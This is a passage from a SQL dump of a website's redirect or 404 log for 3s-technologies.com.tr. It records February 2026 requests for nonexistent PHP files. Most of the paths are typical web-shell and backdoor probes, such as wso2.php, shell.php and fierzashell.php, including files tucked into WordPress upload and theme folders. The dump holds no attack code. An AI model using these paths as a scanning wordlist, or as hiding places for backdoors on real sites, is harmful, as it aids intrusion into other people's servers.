00:00:00',301),(57353,'http://mail.3s-technologies.com.tr/tr/wso2.php',NULL,'','',6,0,'2026-02-13 01:59:43','0000-00-00 00:00:00',301),(57354,'http://mail.3s-technologies.com.tr/tr/small.php',NULL,'','',1,0,'2026-02-13 01:59:44','0000-00-00 00:00:00',301),(57355,'http://mail.3s-technologies.com.tr/tr/contact-demo.php',NULL,'','',1,0,'2026-02-13 01:59:45','0000-00-00 00:00:00',301),(57356,'http://mail.3s-technologies.com.tr/tr/luuf.php',NULL,'','',1,0,'2026-02-13 01:59:46','0000-00-00 00:00:00',301),(57357,'http://mail.3s-technologies.com.tr/tr/_profiler/phpinfo.php',NULL,'','',1,0,'2026-02-13 01:59:47','0000-00-00 00:00:00',301),(57358,'http://mail.3s-technologies.com.tr/tr/contact-us.php',NULL,'','',1,0,'2026-02-13 01:59:48','0000-00-00 00:00:00',301),(57359,'http://mail.3s-technologies.com.tr/tr/1975.php',NULL,'','',1,0,'2026-02-13 01:59:50','0000-00-00 00:00:00',301),(57360,'http://mail.3s-technologies.com.tr/tr/root.php',NULL,'','',4,0,'2026-02-13 01:59:51','0000-00-00 00:00:00',301),(57361,'http://mail.3s-technologies.com.tr/tr/ct.php',NULL,'','',1,0,'2026-02-13 01:59:53','0000-00-00 00:00:00',301),(57362,'http://mail.3s-technologies.com.tr/tr/wso1337.php',NULL,'','',6,0,'2026-02-13 01:59:56','0000-00-00 00:00:00',301),(57363,'http://mail.3s-technologies.com.tr/tr/anone.php',NULL,'','',6,0,'2026-02-13 01:59:57','0000-00-00 00:00:00',301),(57364,'http://mail.3s-technologies.com.tr/tr/3301.php',NULL,'','',6,0,'2026-02-13 01:59:58','0000-00-00 00:00:00',301),(57365,'http://mail.3s-technologies.com.tr/tr/larva.php',NULL,'','',1,0,'2026-02-13 02:00:03','0000-00-00 00:00:00',301),(57366,'http://mail.3s-technologies.com.tr/tr/wp-content/shell.php',NULL,'','',1,0,'2026-02-13 02:00:04','0000-00-00 00:00:00',301),(57367,'http://mail.3s-technologies.com.tr/tr/ract.php',NULL,'','',1,0,'2026-02-13 02:00:05','0000-00-00 00:00:00',301),(57368,'http://mail.3s-technologies.com.tr/tr/city-ajax.php',NULL,'','',1,0,'2026-02-13 02:00:05','0000-00-00 00:00:00',301),(57369,'http://mail.3s-technologies.com.tr/tr/lf.php',NULL,'','',6,0,'2026-02-13 02:00:07','0000-00-00 00:00:00',301),(57370,'http://mail.3s-technologies.com.tr/tr/sterjs.php',NULL,'','',1,0,'2026-02-13 02:00:08','0000-00-00 00:00:00',301),(57371,'http://mail.3s-technologies.com.tr/tr/wp-rss2.php',NULL,'','',1,0,'2026-02-13 02:00:10','0000-00-00 00:00:00',301),(57372,'http://mail.3s-technologies.com.tr/tr/wp-rss.php',NULL,'','',1,0,'2026-02-13 02:00:11','0000-00-00 00:00:00',301),(57373,'http://mail.3s-technologies.com.tr/tr/blog.php',NULL,'','',8,0,'2026-02-13 02:00:13','0000-00-00 00:00:00',301),(57374,'http://mail.3s-technologies.com.tr/tr/am.php',NULL,'','',1,0,'2026-02-13 02:00:14','0000-00-00 00:00:00',301),(57375,'http://mail.3s-technologies.com.tr/tr/jindex.php',NULL,'','',1,0,'2026-02-13 02:00:14','0000-00-00 00:00:00',301),(57376,'http://mail.3s-technologies.com.tr/tr/xox.php',NULL,'','',3,0,'2026-02-13 02:00:16','0000-00-00 00:00:00',301),(57377,'http://mail.3s-technologies.com.tr/tr/rjs.php',NULL,'','',1,0,'2026-02-13 02:00:18','0000-00-00 00:00:00',301),(57378,'http://mail.3s-technologies.com.tr/tr/00:.php',NULL,'','',1,0,'2026-02-13 02:00:19','0000-00-00 00:00:00',301),(57379,'http://mail.3s-technologies.com.tr/tr/at/name.php',NULL,'','',1,0,'2026-02-13 02:00:19','0000-00-00 00:00:00',301),(57380,'http://mail.3s-technologies.com.tr/tr/ta.php',NULL,'','',1,0,'2026-02-13 02:00:20','0000-00-00 00:00:00',301),(57381,'http://mail.3s-technologies.com.tr/tr/edit-css.php',NULL,'','',1,0,'2026-02-13 02:00:23','0000-00-00 00:00:00',301),(57382,'http://mail.3s-technologies.com.tr/tr/op.php',NULL,'','',2,0,'2026-02-13 02:00:24','0000-00-00 00:00:00',301),(57383,'http://mail.3s-technologies.com.tr/tr/minimo.php',NULL,'','',3,0,'2026-02-13 02:00:26','0000-00-00 00:00:00',301),(57384,'http://mail.3s-technologies.com.tr/tr/rxr.php',NULL,'','',1,0,'2026-02-13 02:00:26','0000-00-00 00:00:00',301),(57385,'http://mail.3s-technologies.com.tr/tr/it/name.php',NULL,'','',1,0,'2026-02-13 02:00:29','0000-00-00 00:00:00',301),(57386,'http://mail.3s-technologies.com.tr/tr/foxwso.php',NULL,'','',3,0,'2026-02-13 02:00:30','0000-00-00 00:00:00',301),(57387,'http://mail.3s-technologies.com.tr/tr/api.php',NULL,'','',4,0,'2026-02-13 02:00:31','0000-00-00 00:00:00',301),(57388,'http://mail.3s-technologies.com.tr/tr/kn.php',NULL,'','',6,0,'2026-02-13 02:00:31','0000-00-00 00:00:00',301),(57389,'http://mail.3s-technologies.com.tr/tr/revealability.php',NULL,'','',5,0,'2026-02-13 02:00:34','0000-00-00 00:00:00',301),(57390,'http://mail.3s-technologies.com.tr/tr/us/confirm.php',NULL,'','',1,0,'2026-02-13 02:00:34','0000-00-00 00:00:00',301),(57391,'http://mail.3s-technologies.com.tr/tr/wp-feed.php',NULL,'','',2,0,'2026-02-13 02:00:35','0000-00-00 00:00:00',301),(57392,'http://mail.3s-technologies.com.tr/tr/tuco.php',NULL,'','',1,0,'2026-02-13 02:00:36','0000-00-00 00:00:00',301),(57393,'http://mail.3s-technologies.com.tr/tr/soniau.php',NULL,'','',1,0,'2026-02-13 02:00:37','0000-00-00 00:00:00',301),(57394,'http://mail.3s-technologies.com.tr/tr/fa.php',NULL,'','',1,0,'2026-02-13 02:00:38','0000-00-00 00:00:00',301),(57395,'http://mail.3s-technologies.com.tr/tr/pi.php',NULL,'','',1,0,'2026-02-13 02:00:39','0000-00-00 00:00:00',301),(57396,'http://mail.3s-technologies.com.tr/tr/iwivi.php',NULL,'','',1,0,'2026-02-13 02:00:41','0000-00-00 00:00:00',301),(57397,'http://mail.3s-technologies.com.tr/tr/wp-rdf.php',NULL,'','',2,0,'2026-02-13 02:00:42','0000-00-00 00:00:00',301),(57398,'http://3s-technologies.com.tr/tr/eetu.php',NULL,'','',17,0,'2026-02-13 04:26:39','0000-00-00 00:00:00',301),(57399,'http://3s-technologies.com.tr/tr/lang/en.php',NULL,'','',2,0,'2026-02-13 04:26:40','0000-00-00 00:00:00',301),(57400,'http://3s-technologies.com.tr/tr/se/name.php',NULL,'','',2,0,'2026-02-13 04:26:43','0000-00-00 00:00:00',301),(57401,'http://3s-technologies.com.tr/tr/zfe.php',NULL,'','',5,0,'2026-02-13 04:26:45','0000-00-00 00:00:00',301),(57402,'http://3s-technologies.com.tr/tr/elect.php',NULL,'','',2,0,'2026-02-13 04:26:47','0000-00-00 00:00:00',301),(57403,'http://3s-technologies.com.tr/tr/index_w.php',NULL,'','',2,0,'2026-02-13 04:26:50','0000-00-00 00:00:00',301),(57404,'http://3s-technologies.com.tr/tr/contact-demo.php',NULL,'','',2,0,'2026-02-13 04:26:53','0000-00-00 00:00:00',301),(57405,'http://3s-technologies.com.tr/tr/_profiler/phpinfo.php',NULL,'','',2,0,'2026-02-13 04:26:55','0000-00-00 00:00:00',301),(57406,'http://3s-technologies.com.tr/tr/ct.php',NULL,'','',2,0,'2026-02-13 04:26:59','0000-00-00 00:00:00',301),(57407,'http://3s-technologies.com.tr/tr/il.php',NULL,'','',6,0,'2026-02-13 04:27:06','0000-00-00 00:00:00',301),(57408,'http://3s-technologies.com.tr/tr/.tmb/la.php',NULL,'','',2,0,'2026-02-13 04:27:09','0000-00-00 00:00:00',301),(57409,'http://3s-technologies.com.tr/tr/larva.php',NULL,'','',2,0,'2026-02-13 04:27:09','0000-00-00 00:00:00',301),(57410,'http://3s-technologies.com.tr/tr/ract.php',NULL,'','',2,0,'2026-02-13 04:27:12','0000-00-00 00:00:00',301),(57411,'http://3s-technologies.com.tr/tr/city-ajax.php',NULL,'','',2,0,'2026-02-13 04:27:12','0000-00-00 00:00:00',301),(57412,'http://3s-technologies.com.tr/tr/sterjs.php',NULL,'','',2,0,'2026-02-13 04:27:15','0000-00-00 00:00:00',301),(57413,'http://3s-technologies.com.tr/tr/wp-rss2.php',NULL,'','',2,0,'2026-02-13 04:27:17','0000-00-00 00:00:00',301),(57414,'http://3s-technologies.com.tr/tr/rjs.php',NULL,'','',2,0,'2026-02-13 04:27:24','0000-00-00 00:00:00',301),(57415,'http://3s-technologies.com.tr/tr/00:.php',NULL,'','',2,0,'2026-02-13 04:27:24','0000-00-00 00:00:00',301),(57416,'http://3s-technologies.com.tr/tr/at/name.php',NULL,'','',2,0,'2026-02-13 04:27:25','0000-00-00 00:00:00',301),(57417,'http://3s-technologies.com.tr/tr/ta.php',NULL,'','',7,0,'2026-02-13 04:27:25','0000-00-00 00:00:00',301),(57418,'http://3s-technologies.com.tr/tr/edit-css.php',NULL,'','',2,0,'2026-02-13 04:27:28','0000-00-00 00:00:00',301),(57419,'http://3s-technologies.com.tr/tr/op.php',NULL,'','',3,0,'2026-02-13 04:27:29','0000-00-00 00:00:00',301),(57420,'http://3s-technologies.com.tr/tr/it/name.php',NULL,'','',2,0,'2026-02-13 04:27:34','0000-00-00 00:00:00',301),(57421,'http://3s-technologies.com.tr/tr/us/confirm.php',NULL,'','',2,0,'2026-02-13 04:27:38','0000-00-00 00:00:00',301),(57422,'http://3s-technologies.com.tr/tr/fa.php',NULL,'','',2,0,'2026-02-13 04:27:41','0000-00-00 00:00:00',301),(57423,'http://3s-technologies.com.tr/tr/iwivi.php',NULL,'','',2,0,'2026-02-13 04:27:43','0000-00-00 00:00:00',301),(57424,'http://mail.3s-technologies.com.tr/tr/wp-includes/certificates/index.php',NULL,'','',1,0,'2026-02-13 13:31:50','0000-00-00 00:00:00',301),(57425,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/g/e/e/a/casper.php',NULL,'','',1,0,'2026-02-13 13:31:51','0000-00-00 00:00:00',301),(57426,'http://mail.3s-technologies.com.tr/tr/wordpress/update/wpupex.php',NULL,'','',1,0,'2026-02-13 13:31:52','0000-00-00 00:00:00',301),(57427,'http://mail.3s-technologies.com.tr/tr/wp/wp-content/plugins/classic-editor/js/geido.php',NULL,'','',1,0,'2026-02-13 13:31:53','0000-00-00 00:00:00',301),(57428,'http://mail.3s-technologies.com.tr/tr/wp-content/halo.php',NULL,'','',1,0,'2026-02-13 13:31:54','0000-00-00 00:00:00',301),(57429,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/assets/css/geido.php',NULL,'','',1,0,'2026-02-13 13:31:55','0000-00-00 00:00:00',301),(57430,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/library/upload.php',NULL,'','',1,0,'2026-02-13 13:31:55','0000-00-00 00:00:00',301),(57431,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php',NULL,'','',3,0,'2026-02-13 13:31:56','0000-00-00 00:00:00',301),(57432,'http://mail.3s-technologies.com.tr/tr/dapa.php',NULL,'','',1,0,'2026-02-13 13:31:57','0000-00-00 00:00:00',301),(57433,'http://www.3s-technologies.com.tr/tr/wp-includes/certificates/index.php',NULL,'','',1,0,'2026-02-13 18:12:46','0000-00-00 00:00:00',301),(57434,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/gravity_forms/g/e/e/a/casper.php',NULL,'','',1,0,'2026-02-13 18:12:47','0000-00-00 00:00:00',301),(57435,'http://www.3s-technologies.com.tr/tr/spip.php',NULL,'','',1,0,'2026-02-13 18:12:47','0000-00-00 00:00:00',301),(57436,'http://www.3s-technologies.com.tr/tr/scripts/wpup.php',NULL,'','',1,0,'2026-02-13 18:12:47','0000-00-00 00:00:00',301),(57437,'http://www.3s-technologies.com.tr/tr/wordpress/update/wpupex.php',NULL,'','',1,0,'2026-02-13 18:12:48','0000-00-00 00:00:00',301),(57438,'http://www.3s-technologies.com.tr/tr/wp/wp-content/plugins/classic-editor/js/geido.php',NULL,'','',1,0,'2026-02-13 18:12:49','0000-00-00 00:00:00',301),(57439,'http://www.3s-technologies.com.tr/tr/myy.php',NULL,'','',1,0,'2026-02-13 18:12:50','0000-00-00 00:00:00',301),(57440,'http://www.3s-technologies.com.tr/tr/wp-content/halo.php',NULL,'','',1,0,'2026-02-13 18:12:50','0000-00-00 00:00:00',301),(57441,'http://www.3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/assets/css/geido.php',NULL,'','',1,0,'2026-02-13 18:12:51','0000-00-00 00:00:00',301),(57442,'http://www.3s-technologies.com.tr/tr/wp-includes/requests/library/upload.php',NULL,'','',1,0,'2026-02-13 18:12:51','0000-00-00 00:00:00',301),(57443,'http://www.3s-technologies.com.tr/tr/dapa.php',NULL,'','',1,0,'2026-02-13 18:12:53','0000-00-00 00:00:00',301),(57444,'http://3s-technologies.com.tr/tr/ak.php/wp-admin/async-upload.php',NULL,'','',7,0,'2026-02-13 18:28:46','0000-00-00 00:00:00',301),(57445,'http://3s-technologies.com.tr/tr/a4.php/wp-admin/index.php',NULL,'','',7,0,'2026-02-13 18:28:48','0000-00-00 00:00:00',301),(57446,'http://3s-technologies.com.tr/tr/yooldisk.php',NULL,'','',5,0,'2026-02-14 10:20:28','0000-00-00 00:00:00',301),(57447,'http://3s-technologies.com.tr/tr/ws66.php',NULL,'','',27,0,'2026-02-14 17:01:59','0000-00-00 00:00:00',301),(57448,'http://3s-technologies.com.tr/tr/x57.php',NULL,'','',26,0,'2026-02-14 17:02:02','0000-00-00 00:00:00',301),(57449,'http://3s-technologies.com.tr/tr/ioxi1.php',NULL,'','',1,0,'2026-02-14 17:02:05','0000-00-00 00:00:00',301),(57450,'http://3s-technologies.com.tr/tr/capte.php',NULL,'','',2,0,'2026-02-14 17:02:07','0000-00-00 00:00:00',301),(57451,'http://3s-technologies.com.tr/tr/bugger.php',NULL,'','',2,0,'2026-02-14 17:02:10','0000-00-00 00:00:00',301),(57452,'http://3s-technologies.com.tr/tr/.trash7206/index.php',NULL,'','',4,0,'2026-02-15 01:44:32','0000-00-00 00:00:00',301),(57453,'https://3s-technologies.com.tr/tr/registration',NULL,'','',1,0,'2026-02-15 11:21:43','0000-00-00 00:00:00',301),(57454,'https://3s-technologies.com.tr/en/ru/component/users?view=registration',NULL,'','',1,0,'2026-02-15 11:21:44','0000-00-00 00:00:00',301),(57455,'http://3s-technologies.com.tr/tr/ws71.php',NULL,'','',6,0,'2026-02-15 20:32:33','0000-00-00 00:00:00',301),(57456,'http://3s-technologies.com.tr/tr/wp-p2r3q9c8k4.php',NULL,'','',34,0,'2026-02-15 20:32:37','0000-00-00 00:00:00',301),(57457,'http://3s-technologies.com.tr/tr/bureaucrats.php',NULL,'','',2,0,'2026-02-15 20:32:39','0000-00-00 00:00:00',301),(57458,'http://3s-technologies.com.tr/tr/yrmeu.php',NULL,'','',2,0,'2026-02-15 20:32:40','0000-00-00 00:00:00',301),(57459,'http://3s-technologies.com.tr/tr/inclusively.php',NULL,'','',2,0,'2026-02-15 20:32:42','0000-00-00 00:00:00',301),(57460,'http://3s-technologies.com.tr/tr/invisi.php',NULL,'','',4,0,'2026-02-15 20:32:43','0000-00-00 00:00:00',301),(57461,'http://3s-technologies.com.tr/tr/xr.php',NULL,'','',12,0,'2026-02-15 20:32:44','0000-00-00 00:00:00',301),(57462,'http://3s-technologies.com.tr/tr/bolaf.php',NULL,'','',2,0,'2026-02-15 20:32:47','0000-00-00 00:00:00',301),(57463,'http://3s-technologies.com.tr/tr/knightly.php',NULL,'','',2,0,'2026-02-15 20:32:47','0000-00-00 00:00:00',301),(57464,'http://3s-technologies.com.tr/tr/cap.php',NULL,'','',36,0,'2026-02-15 20:32:48','0000-00-00 00:00:00',301),(57465,'http://3s-technologies.com.tr/tr/callback.php',NULL,'','',24,0,'2026-02-15 20:32:49','0000-00-00 00:00:00',301),(57466,'http://3s-technologies.com.tr/tr/knme.php',NULL,'','',6,0,'2026-02-15 20:32:50','0000-00-00 00:00:00',301),(57467,'http://3s-technologies.com.tr/tr/bgwnfsal.php',NULL,'','',2,0,'2026-02-15 20:32:50','0000-00-00 00:00:00',301),(57468,'http://3s-technologies.com.tr/tr/lcyhl.php',NULL,'','',2,0,'2026-02-15 20:32:52','0000-00-00 00:00:00',301),(57469,'http://3s-technologies.com.tr/tr/zelxoo.php',NULL,'','',2,0,'2026-02-15 20:32:53','0000-00-00 00:00:00',301),(57470,'http://3s-technologies.com.tr/tr/auujk.php',NULL,'','',2,0,'2026-02-15 20:32:53','0000-00-00 00:00:00',301),(57471,'http://3s-technologies.com.tr/tr/borax.php',NULL,'','',2,0,'2026-02-15 20:32:54','0000-00-00 00:00:00',301),(57472,'http://3s-technologies.com.tr/tr/hidedz.php',NULL,'','',2,0,'2026-02-15 20:32:55','0000-00-00 00:00:00',301),(57473,'http://3s-technologies.com.tr/tr/likmt.php',NULL,'','',2,0,'2026-02-15 20:32:55','0000-00-00 00:00:00',301),(57474,'http://3s-technologies.com.tr/tr/x3x.php',NULL,'','',7,0,'2026-02-15 20:32:58','0000-00-00 00:00:00',301),(57475,'http://3s-technologies.com.tr/tr/wgift2.php',NULL,'','',2,0,'2026-02-15 20:32:59','0000-00-00 00:00:00',301),(57476,'http://3s-technologies.com.tr/tr/knoxville.php',NULL,'','',2,0,'2026-02-15 20:33:00','0000-00-00 00:00:00',301),(57477,'http://3s-technologies.com.tr/tr/fizsb.php',NULL,'','',2,0,'2026-02-15 20:33:01','0000-00-00 00:00:00',301),(57478,'http://3s-technologies.com.tr/tr/securepassword',NULL,'','',1,0,'2026-02-15 20:33:02','0000-00-00 00:00:00',301),(57479,'http://3s-technologies.com.tr/tr/pomzr.php',NULL,'','',2,0,'2026-02-15 20:33:03','0000-00-00 00:00:00',301),(57480,'http://3s-technologies.com.tr/tr/momo.php',NULL,'','',7,0,'2026-02-15 20:33:05','0000-00-00 00:00:00',301),(57481,'http://3s-technologies.com.tr/tr/oke.php',NULL,'','',2,0,'2026-02-15 20:33:06','0000-00-00 00:00:00',301),(57482,'http://3s-technologies.com.tr/tr/ws67.php',NULL,'','',8,0,'2026-02-15 20:33:06','0000-00-00 00:00:00',301),(57483,'http://3s-technologies.com.tr/tr/ab8.php',NULL,'','',2,0,'2026-02-15 20:33:07','0000-00-00 00:00:00',301),(57484,'http://3s-technologies.com.tr/tr/curl.php',NULL,'','',4,0,'2026-02-15 20:33:08','0000-00-00 00:00:00',301),(57485,'http://3s-technologies.com.tr/tr/tx64.php',NULL,'','',3,0,'2026-02-15 20:33:09','0000-00-00 00:00:00',301),(57486,'http://3s-technologies.com.tr/tr/japan.php',NULL,'','',2,0,'2026-02-15 20:33:11','0000-00-00 00:00:00',301),(57487,'http://3s-technologies.com.tr/tr/rbvds.php',NULL,'','',2,0,'2026-02-15 20:33:13','0000-00-00 00:00:00',301),(57488,'http://3s-technologies.com.tr/tr/foundling.php',NULL,'','',2,0,'2026-02-15 20:33:14','0000-00-00 00:00:00',301),(57489,'http://3s-technologies.com.tr/tr/xper1.php',NULL,'','',27,0,'2026-02-15 20:33:15','0000-00-00 00:00:00',301),(57490,'http://3s-technologies.com.tr/tr/jzntz.php',NULL,'','',2,0,'2026-02-15 20:33:17','0000-00-00 00:00:00',301),(57491,'http://3s-technologies.com.tr/tr/106.php',NULL,'','',7,0,'2026-02-15 20:33:19','0000-00-00 00:00:00',301),(57492,'http://3s-technologies.com.tr/tr/dunk.php',NULL,'','',2,0,'2026-02-15 20:33:19','0000-00-00 00:00:00',301),(57493,'http://3s-technologies.com.tr/tr/ujuqsqhd.php',NULL,'','',2,0,'2026-02-15 20:33:20','0000-00-00 00:00:00',301),(57494,'http://3s-technologies.com.tr/tr/mtmem.php',NULL,'','',2,0,'2026-02-15 20:33:21','0000-00-00 00:00:00',301),(57495,'http://3s-technologies.com.tr/tr/reversely.php',NULL,'','',2,0,'2026-02-15 20:33:22','0000-00-00 00:00:00',301),(57496,'http://3s-technologies.com.tr/tr/lrzkh.php',NULL,'','',2,0,'2026-02-15 20:33:23','0000-00-00 00:00:00',301),(57497,'http://3s-technologies.com.tr/tr/iopra.php',NULL,'','',2,0,'2026-02-15 20:33:24','0000-00-00 00:00:00',301),(57498,'http://3s-technologies.com.tr/tr/securepassword.php',NULL,'','',2,0,'2026-02-16 19:21:54','0000-00-00 00:00:00',301),(57499,'http://mail.3s-technologies.com.tr/tr/asax.',NULL,'','',1,0,'2026-02-17 01:21:43','0000-00-00 00:00:00',301),(57500,'http://mail.3s-technologies.com.tr/tr/apk.php',NULL,'','',3,0,'2026-02-17 01:22:11','0000-00-00 00:00:00',301),(57501,'http://mail.3s-technologies.com.tr/tr/admin-footer.php',NULL,'','',14,0,'2026-02-17 01:22:16','0000-00-00 00:00:00',301),(57502,'http://mail.3s-technologies.com.tr/tr/wp-p2r3q9c8k4.php',NULL,'','',20,0,'2026-02-17 01:22:17','0000-00-00 00:00:00',301),(57503,'http://mail.3s-technologies.com.tr/tr/callback.php',NULL,'','',13,0,'2026-02-17 01:22:21','0000-00-00 00:00:00',301),(57504,'http://mail.3s-technologies.com.tr/tr/logs.php',NULL,'','',5,0,'2026-02-17 01:22:22','0000-00-00 00:00:00',301),(57505,'http://mail.3s-technologies.com.tr/tr/ajax.php',NULL,'','',10,0,'2026-02-17 01:22:23','0000-00-00 00:00:00',301),(57506,'http://mail.3s-technologies.com.tr/tr/xr.php',NULL,'','',7,0,'2026-02-17 01:22:24','0000-00-00 00:00:00',301),(57507,'http://mail.3s-technologies.com.tr/tr/knme.php',NULL,'','',3,0,'2026-02-17 01:22:26','0000-00-00 00:00:00',301),(57508,'http://mail.3s-technologies.com.tr/tr/ws71.php',NULL,'','',3,0,'2026-02-17 01:22:27','0000-00-00 00:00:00',301),(57509,'http://mail.3s-technologies.com.tr/tr/ws67.php',NULL,'','',4,0,'2026-02-17 01:22:28','0000-00-00 00:00:00',301),(57510,'http://mail.3s-technologies.com.tr/tr/momo.php',NULL,'','',3,0,'2026-02-17 01:22:28','0000-00-00 00:00:00',301),(57511,'http://3s-technologies.com.tr/tr/tfm.php',NULL,'','',66,0,'2026-02-17 02:36:31','0000-00-00 00:00:00',301),(57512,'http://3s-technologies.com.tr/tr/asax.',NULL,'','',1,0,'2026-02-17 02:36:33','0000-00-00 00:00:00',301),(57513,'http://3s-technologies.com.tr/tr/apk.php',NULL,'','',4,0,'2026-02-17 02:36:53','0000-00-00 00:00:00',301),(57514,'http://3s-technologies.com.tr/tr/server_info.php',NULL,'','',2,0,'2026-02-17 07:33:34','0000-00-00 00:00:00',301),(57515,'http://3s-technologies.com.tr/tr/moded.php',NULL,'','',1,0,'2026-02-17 07:33:36','0000-00-00 00:00:00',301),(57516,'http://3s-technologies.com.tr/tr/checkbex.php',NULL,'','',1,0,'2026-02-17 07:33:38','0000-00-00 00:00:00',301),(57517,'http://3s-technologies.com.tr/tr/en.php',NULL,'','',1,0,'2026-02-17 07:33:40','0000-00-00 00:00:00',301),(57518,'http://3s-technologies.com.tr/tr/owlmailer.php',NULL,'','',2,0,'2026-02-17 07:33:41','0000-00-00 00:00:00',301),(57519,'http://3s-technologies.com.tr/tr/gf.php',NULL,'','',1,0,'2026-02-17 07:33:43','0000-00-00 00:00:00',301),(57520,'http://3s-technologies.com.tr/tr/disagraeosc.php',NULL,'','',1,0,'2026-02-17 07:33:56','0000-00-00 00:00:00',301),(57521,'http://3s-technologies.com.tr/tr/uuj9wgn1.php',NULL,'','',1,0,'2026-02-17 07:33:57','0000-00-00 00:00:00',301),(57522,'http://3s-technologies.com.tr/tr/config_load.php',NULL,'','',1,0,'2026-02-17 07:33:58','0000-00-00 00:00:00',301),(57523,'http://3s-technologies.com.tr/tr/inf.php',NULL,'','',2,0,'2026-02-17 07:34:00','0000-00-00 00:00:00',301),(57524,'http://3s-technologies.com.tr/tr/optimizer.php',NULL,'','',1,0,'2026-02-17 07:34:01','0000-00-00 00:00:00',301),(57525,'http://3s-technologies.com.tr/tr/nice.php',NULL,'','',5,0,'2026-02-17 07:34:04','0000-00-00 00:00:00',301),(57526,'http://3s-technologies.com.tr/tr/dfgev2ig.php',NULL,'','',1,0,'2026-02-17 07:34:07','0000-00-00 00:00:00',301),(57527,'http://3s-technologies.com.tr/tr/wizard.php',NULL,'','',1,0,'2026-02-17 07:34:08','0000-00-00 00:00:00',301),(57528,'http://3s-technologies.com.tr/tr/eplzpmzn.php',NULL,'','',1,0,'2026-02-17 07:34:10','0000-00-00 00:00:00',301),(57529,'http://3s-technologies.com.tr/tr/jasmine.php',NULL,'','',1,0,'2026-02-17 07:34:11','0000-00-00 00:00:00',301),(57530,'http://3s-technologies.com.tr/tr/phpinfo1.php',NULL,'','',1,0,'2026-02-17 07:34:13','0000-00-00 00:00:00',301),(57531,'http://3s-technologies.com.tr/tr/cjlgqzb.php',NULL,'','',1,0,'2026-02-17 07:34:14','0000-00-00 00:00:00',301),(57532,'http://3s-technologies.com.tr/tr/lig.php',NULL,'','',1,0,'2026-02-17 07:34:15','0000-00-00 00:00:00',301),(57533,'http://3s-technologies.com.tr/tr/addslashes.php',NULL,'','',1,0,'2026-02-17 07:34:16','0000-00-00 00:00:00',301),(57534,'http://3s-technologies.com.tr/tr/latest-en.php',NULL,'','',1,0,'2026-02-17 07:34:17','0000-00-00 00:00:00',301),(57535,'http://3s-technologies.com.tr/tr/smile.php',NULL,'','',1,0,'2026-02-17 07:34:19','0000-00-00 00:00:00',301),(57536,'http://3s-technologies.com.tr/tr/upload_handler.php',NULL,'','',1,0,'2026-02-17 07:34:22','0000-00-00 00:00:00',301),(57537,'http://3s-technologies.com.tr/tr/css/class-config.php',NULL,'','',1,0,'2026-02-17 07:34:23','0000-00-00 00:00:00',301),(57538,'http://3s-technologies.com.tr/tr/cangma.php',NULL,'','',1,0,'2026-02-17 07:34:24','0000-00-00 00:00:00',301),(57539,'http://3s-technologies.com.tr/tr/compressor.php',NULL,'','',1,0,'2026-02-17 07:34:26','0000-00-00 00:00:00',301),(57540,'http://3s-technologies.com.tr/tr/app_dev.php',NULL,'','',1,0,'2026-02-17 07:34:30','0000-00-00 00:00:00',301),(57541,'http://3s-technologies.com.tr/tr/auhz05.php',NULL,'','',1,0,'2026-02-17 07:34:31','0000-00-00 00:00:00',301),(57542,'http://3s-technologies.com.tr/tr/rlpc.php',NULL,'','',2,0,'2026-02-17 07:34:34','0000-00-00 00:00:00',301),(57543,'http://3s-technologies.com.tr/tr/loghandler.php',NULL,'','',1,0,'2026-02-17 07:34:36','0000-00-00 00:00:00',301),(57544,'http://3s-technologies.com.tr/tr/api_logs.php',NULL,'','',1,0,'2026-02-17 07:34:41','0000-00-00 00:00:00',301),(57545,'http://3s-technologies.com.tr/tr/default-constants.php',NULL,'','',1,0,'2026-02-17 07:34:43','0000-00-00 00:00:00',301),(57546,'http://3s-technologies.com.tr/tr/dqbayyrz.php',NULL,'','',2,0,'2026-02-17 07:34:44','0000-00-00 00:00:00',301),(57547,'http://3s-technologies.com.tr/tr/wp-content/themes/oceanwp-child/functions.php',NULL,'','',1,0,'2026-02-17 07:34:48','0000-00-00 00:00:00',301),(57548,'http://3s-technologies.com.tr/tr/password.php',NULL,'','',1,0,'2026-02-17 07:34:50','0000-00-00 00:00:00',301),(57549,'http://3s-technologies.com.tr/tr/fierzashell.php',NULL,'','',1,0,'2026-02-17 07:34:51','0000-00-00 00:00:00',301),(57550,'http://3s-technologies.com.tr/tr/excel.php',NULL,'','',1,0,'2026-02-17 07:34:54','0000-00-00 00:00:00',301),(57551,'http://3s-technologies.com.tr/tr/role.php',NULL,'','',1,0,'2026-02-17 07:34:57','0000-00-00 00:00:00',301),(57552,'http://3s-technologies.com.tr/tr/phpinfo3.php',NULL,'','',1,0,'2026-02-17 07:35:00','0000-00-00 00:00:00',301),(57553,'http://3s-technologies.com.tr/tr/thumbnail.php',NULL,'','',1,0,'2026-02-17 07:35:02','0000-00-00 00:00:00',301),(57554,'http://3s-technologies.com.tr/tr/media-upload.php',NULL,'','',1,0,'2026-02-17 07:35:06','0000-00-00 00:00:00',301),(57555,'http://3s-technologies.com.tr/tr/wsoyanzfv3.php',NULL,'','',1,0,'2026-02-17 07:35:10','0000-00-00 00:00:00',301),(57556,'http://3s-technologies.com.tr/tr/class-wp-ajax-response.php',NULL,'','',1,0,'2026-02-17 07:35:13','0000-00-00 00:00:00',301),(57557,'http://3s-technologies.com.tr/tr/pinuseren.php',NULL,'','',1,0,'2026-02-17 07:35:16','0000-00-00 00:00:00',301),(57558,'http://3s-technologies.com.tr/tr/ioptimize.php',NULL,'','',1,0,'2026-02-17 07:35:19','0000-00-00 00:00:00',301),(57559,'http://3s-technologies.com.tr/tr/xsam_xadoo_00bot.php',NULL,'','',1,0,'2026-02-17 07:35:24','0000-00-00 00:00:00',301),(57560,'http://3s-technologies.com.tr/tr/options-discussion.php',NULL,'','',1,0,'2026-02-17 07:35:25','0000-00-00 00:00:00',301),(57561,'http://3s-technologies.com.tr/tr/analytics.php',NULL,'','',1,0,'2026-02-17 07:35:34','0000-00-00 00:00:00',301),(57562,'http://3s-technologies.com.tr/tr/rfgsrd.php',NULL,'','',1,0,'2026-02-17 07:35:35','0000-00-00 00:00:00',301),(57563,'http://3s-technologies.com.tr/tr/5173e.php',NULL,'','',1,0,'2026-02-17 07:35:36','0000-00-00 00:00:00',301),(57564,'http://3s-technologies.com.tr/tr/malware.php',NULL,'','',1,0,'2026-02-17 